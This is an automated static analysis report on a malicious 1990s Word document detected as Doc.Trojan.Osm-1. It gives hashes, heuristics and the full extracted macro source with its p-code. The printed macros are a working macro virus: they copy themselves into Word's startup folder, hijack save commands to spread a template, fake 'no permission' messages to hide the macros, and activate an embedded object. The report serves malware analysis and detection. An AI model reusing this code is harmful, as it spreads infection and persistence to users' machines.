Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b363b02ede1c3f9b…

MALICIOUS

Office (OLE)

269.0 KB Created: 1998-11-10 03:12:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 1d7a4af41912c4f0d28ede1cb5ec6fca SHA-1: 73beb9d3750dfb9326c6c1f46e97a7839b453696 SHA-256: b363b02ede1c3f9b47e80f6d12fcded51caec799cc11bd0ece83a0f352668034
236 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains legacy WordBasic macro markers and a critical ClamAV detection for 'Doc.Trojan.Osm-1'. The AutoOpen macro attempts to copy the current document's template to the Word startup directory as 'Startup.dot' using the FCopy function, which is a persistence mechanism. It also attempts to copy this 'Startup.dot' to 'Default.dot' in the active document's path and set it as the attached template, potentially to ensure future documents also run the macro.

Heuristics 6

  • ClamAV: Doc.Trojan.Osm-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Osm-1
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 275,456 bytes but its declared streams total only 54,531 bytes — 220,925 bytes (80%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9435 bytes
SHA-256: 7d51b7f16a13f15e472334e392624cdf75d48f45527311085439f2e44b13dd07
Detection
ClamAV: Doc.Trojan.Osm-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_New()

End Sub

Attribute VB_Name = "NewMacros"
Private Declare Function FCopy Lib "kernel32" Alias "CopyFileA" (ByVal src As String, ByVal dest As String, ByVal FailExist As Boolean) As Boolean
Sub AutoExec()
    On Error GoTo p0p
    If FileLen(Application.StartupPath + "\Startup.dot") < 10 Then MsgBox ("1")
    Exit Sub
    
p0p:
    Insert
End Sub

Sub AutoOpen()
Attribute AutoOpen.VB_Description = "Macro created 03/11/98 by ITSC"
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "TemplateProject.NewMacros.AutoOpen"
    On Error GoTo p0p
    If FileLen(Application.StartupPath + "\Startup.dot") < 10 Then MsgBox ("1")
    Exit Sub
    
p0p:
    Insert
    EntryPoint
End Sub
Sub AutoClose()
    Application.NormalTemplate.Saved = True
End Sub

Sub Insert()
    On Error Resume Next
    Application.ScreenUpdating = False
    
    Dim src, dest As String
    dest = Application.StartupPath + "\Startup.dot"
    src = ActiveDocument.AttachedTemplate.FullName
       
    FCopy src, dest, False
    
    Application.ScreenUpdating = True

End Sub

Sub Copy()
    On Error Resume Next
    Dim src, dest As String
    dest = ActiveDocument.Path + "\Default.dot"
    src = Application.StartupPath + "\Startup.dot"
    
    Application.ScreenUpdating = False
    FCopy src, dest, False
        
    ActiveDocument.AttachedTemplate = dest
    ActiveDocument.Save
    
    Application.ScreenUpdating = True
End Sub
Sub FileSave()

    ActiveDocument.Save
    Copy
End Sub
Sub FileSaveAs()

    Dialogs(wdDialogFileSaveAs).Show
    Copy
End Sub

Sub ToolsMacro()
    On Error Resume Next
    Load dlgMyMacs
    
    dlgMyMacs.cmbIn.Clear
    dlgMyMacs.TextBox1.Text = ""
    dlgMyMacs.cmbIn.AddItem "All active templates and documents"
    dlgMyMacs.cmbIn.SelText = "All active templates and documents"
    dlgMyMacs.cmbIn.AddItem "Normal (global template)"
    dlgMyMacs.cmbIn.AddItem "Word commands"
    dlgMyMacs.cmbIn.AddItem ActiveDocument.Name + " (document)"
    
    dlgMyMacs.Show

End Sub

Sub ToolsRecordMacroToggle()
Attribute ToolsRecordMacroToggle.VB_Description = "Turns macro recording on or off"
Attribute ToolsRecordMacroToggle.VB_ProcData.VB_Invoke_Func = "TemplateProject.NewMacros.ToolsRecordMacroToggle"
    MsgBox "You do not have permission to create macros on this computer.", vbOKOnly, "Microsoft Word"
End Sub

Sub EntryPoint()
    ThisDocument.Shapes(1).Activate
    ThisDocument.Saved = True
End Sub

Sub Show()
    ThisDocument.Shapes(1).Visible = msoTrue
End Sub

Sub Hide()
    ThisDocument.Shapes(1).Visible = msoFalse
End Sub

Attribute VB_Name = "dlgMyMacs"
Attribute VB_Base = "0{00F9188F-DD07-11D2-8BD1-08002B3FF385}{00F91880-DD07-11D2-8BD1-08002B3FF385}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub CommandButton3_Click()
    dlgMyMacs.Hide
End Sub

Private Sub CommandButton4_Click()
    dlgMyMacs.Hide
End Sub

Private Sub CommandButton6_Click()
    MsgBox "You do not have permission to create macros on this computer.", vbOKOnly, "Microsoft Word"
End Sub

' Processing file: /tmp/qstore_uro401s8
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 2330 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_New())
' Line #1:
' Line #2:
' 	EndSub 
' Macros/VBA/NewMacros - 14514 bytes
' Line #0:
' 	FuncDefn (Private Declare Function FCopy Lib "kernel32" (ByVal src As String, ByVal dest As String, ByVal FailExist As Boolean) As Boolean)
' Line #1:
' 	FuncDefn (Sub AutoExec())
' Line #2:
' 	OnError p0p 
' Line #3:
' 	Ld Application 
' 	MemLd StartupPath 
' 	LitStr 0x000C "\Startup.dot"
' 	Add 
' 	ArgsLd FileLen 0x0001 
' 	LitDI2 0x000A 
' 	Lt 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x0001 "1"
' 	Paren 
' 	ArgsCall MsgBox 0x0001 
' 	EndIf 
' Line #4:
' 	ExitSub 
' Line #5:
' Line #6:
' 	Label p0p 
' Line #7:
' 	ArgsCall Insert 0x0000 
' Line #8:
' 	EndSub 
' Line #9:
' Line #10:
' 	FuncDefn (Sub AutoOpen())
' Line #11:
' 	OnError p0p 
' Line #12:
' 	Ld Application 
' 	MemLd StartupPath 
' 	LitStr 0x000C "\Startup.dot"
' 	Add 
' 	ArgsLd FileLen 0x0001 
' 	LitDI2 0x000A 
' 	Lt 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x0001 "1"
' 	Paren 
' 	ArgsCall MsgBox 0x0001 
' 	EndIf 
' Line #13:
' 	ExitSub 
' Line #14:
' Line #15:
' 	Label p0p 
' Line #16:
' 	ArgsCall Insert 0x0000 
' Line #17:
' 	ArgsCall EntryPoint 0x0000 
' Line #18:
' 	EndSub 
' Line #19:
' 	FuncDefn (Sub AutoClose())
' Line #20:
' 	LitVarSpecial (True)
' 	Ld Application 
' 	MemLd NormalTemplate 
' 	MemSt Saved 
' Line #21:
' 	EndSub 
' Line #22:
' Line #23:
' 	FuncDefn (Sub Insert())
' Line #24:
' 	OnError (Resume Next) 
' Line #25:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #26:
' Line #27:
' 	Dim 
' 	VarDefn src
' 	VarDefn dest (As String)
' Line #28:
' 	Ld Application 
' 	MemLd StartupPath 
' 	LitStr 0x000C "\Startup.dot"
' 	Add 
' 	St dest 
' Line #29:
' 	Ld ActiveDocument 
' 	MemLd AttachedTemplate 
' 	MemLd FullName 
' 	St src 
' Line #30:
' Line #31:
' 	Ld src 
' 	Ld dest 
' 	LitVarSpecial (False)
' 	ArgsCall FCopy 0x0003 
' Line #32:
' Line #33:
' 	LitVarSpecial (True)
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #34:
' Line #35:
' 	EndSub 
' Line #36:
' Line #37:
' 	FuncDefn (Sub Copy())
' Line #38:
' 	OnError (Resume Next) 
' Line #39:
' 	Dim 
' 	VarDefn src
' 	VarDefn dest (As String)
' Line #40:
' 	Ld ActiveDocument 
' 	MemLd Path 
' 	LitStr 0x000C "\Default.dot"
' 	Add 
' 	St dest 
' Line #41:
' 	Ld Application 
' 	MemLd StartupPath 
' 	LitStr 0x000C "\Startup.dot"
' 	Add 
' 	St src 
' Line #42:
' Line #43:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #44:
' 	Ld src 
' 	Ld dest 
' 	LitVarSpecial (False)
' 	ArgsCall FCopy 0x0003 
' Line #45:
' Line #46:
' 	Ld dest 
' 	Ld ActiveDocument 
' 	MemSt AttachedTemplate 
' Line #47:
' 	Ld ActiveDocument 
' 	ArgsMemCall Save 0x0000 
' Line #48:
' Line #49:
' 	LitVarSpecial (True)
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #50:
' 	EndSub 
' Line #51:
' 	FuncDefn (Sub FileSave())
' Line #52:
' Line #53:
' 	Ld ActiveDocument 
' 	ArgsMemCall Save 0x0000 
' Line #54:
' 	ArgsCall Copy 0x0000 
' Line #55:
' 	EndSub 
' Line #56:
' 	FuncDefn (Sub FileSaveAs())
' Line #57:
' Line #58:
' 	Ld wdDialogFileSaveAs 
' 	ArgsLd Dialogs 0x0001 
' 	ArgsMemCall Show 0x0000 
' Line #59:
' 	ArgsCall Copy 0x0000 
' Line #60:
' 	EndSub 
' Line #61:
' Line #62:
' 	FuncDefn (Sub ToolsMacro())
' Line #63:
' 	OnError (Resume Next) 
' Line #64:
' 	Ld dlgMyMacs 
' 	ArgsCall Local 0x0001 
' Line #65:
' Line #66:
' 	Ld dlgMyMacs 
' 	MemLd cmbIn 
' 	ArgsMemCall Clear 0x0000 
' Line #67:
' 	LitStr 0x0000 ""
' 	Ld dlgMyMacs 
' 	MemLd TextBox1 
' 	MemSt Then 
' Line #68:
' 	LitStr 0x0022 "All active templates and documents"
' 	Ld dlgMyMacs 
' 	MemLd cmbIn 
' 	ArgsMemCall AddItem 0x0001 
' Line #69:
' 	LitStr 0x0022 "All active templates and documents"
' 	Ld dlgMyMacs 
' 	MemLd cmbIn 
' 	MemSt SelText 
' Line #70:
' 	LitStr 0x0018 "Normal (global template)"
' 	Ld dlgMyMacs 
' 	MemLd cmbIn 
' 	ArgsMemCall AddItem 0x0001 
' Line #71:
' 	LitStr 0x000D "Word commands"
' 	Ld dlgMyMacs 
' 	MemLd cmbIn 
' 	ArgsMemCall AddItem 0x0001 
' Line #72:
' 	Ld ActiveDocument 
' 	MemLd New 
' 	LitStr 0x000B " (document)"
' 	Add 
' 	Ld dlgMyMacs 
' 	MemLd cmbIn 
' 	ArgsMemCall AddItem 0x0001 
' Line #73:
' Line #74:
' 	Ld dlgMyMacs 
' 	ArgsMemCall Show 0x0000 
' Line #75:
' Line #76:
' 	EndSub 
' Line #77:
' Line #78:
' 	FuncDefn (Sub ToolsRecordMacroToggle())
' Line #79:
' 	LitStr 0x003D "You do not have permission to create macros on this computer."
' 	Ld vbOKOnly 
' 	LitStr 0x000E "Microsoft Word"
' 	ArgsCall MsgBox 0x0003 
' Line #80:
' 	EndSub 
' Line #81:
' Line #82:
' 	FuncDefn (Sub EntryPoint())
' Line #83:
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	ArgsMemLd Shapes 0x0001 
' 	ArgsMemCall Activate 0x0000 
' Line #84:
' 	LitVarSpecial (True)
' 	Ld ThisDocument 
' 	MemSt Saved 
' Line #85:
' 	EndSub 
' Line #86:
' Line #87:
' 	FuncDefn (Sub Show())
' Line #88:
' 	Ld msoTrue 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	ArgsMemLd Shapes 0x0001 
' 	MemSt Visible 
' Line #89:
' 	EndSub 
' Line #90:
' Line #91:
' 	FuncDefn (Sub Hide())
' Line #92:
' 	Ld msoFalse 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	ArgsMemLd Shapes 0x0001 
' 	MemSt Visible 
' Line #93:
' 	EndSub 
' Macros/VBA/dlgMyMacs - 3297 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Private Sub CommandButton3_Click())
' Line #2:
' 	Ld dlgMyMacs 
' 	ArgsMemCall Hide 0x0000 
' Line #3:
' 	EndSub 
' Line #4:
' Line #5:
' 	FuncDefn (Private Sub CommandButton4_Click())
' Line #6:
' 	Ld dlgMyMacs 
' 	ArgsMemCall Hide 0x0000 
' Line #7:
' 	EndSub 
' Line #8:
' Line #9:
' 	FuncDefn (Private Sub CommandButton6_Click())
' Line #10:
' 	LitStr 0x003D "You do not have permission to create macros on this computer."
' 	Ld vbOKOnly 
' 	LitStr 0x000E "Microsoft Word"
' 	ArgsCall MsgBox 0x0003 
' Line #11:
' 	EndSub

Open this report in the interactive analyzer, or submit your own file for analysis.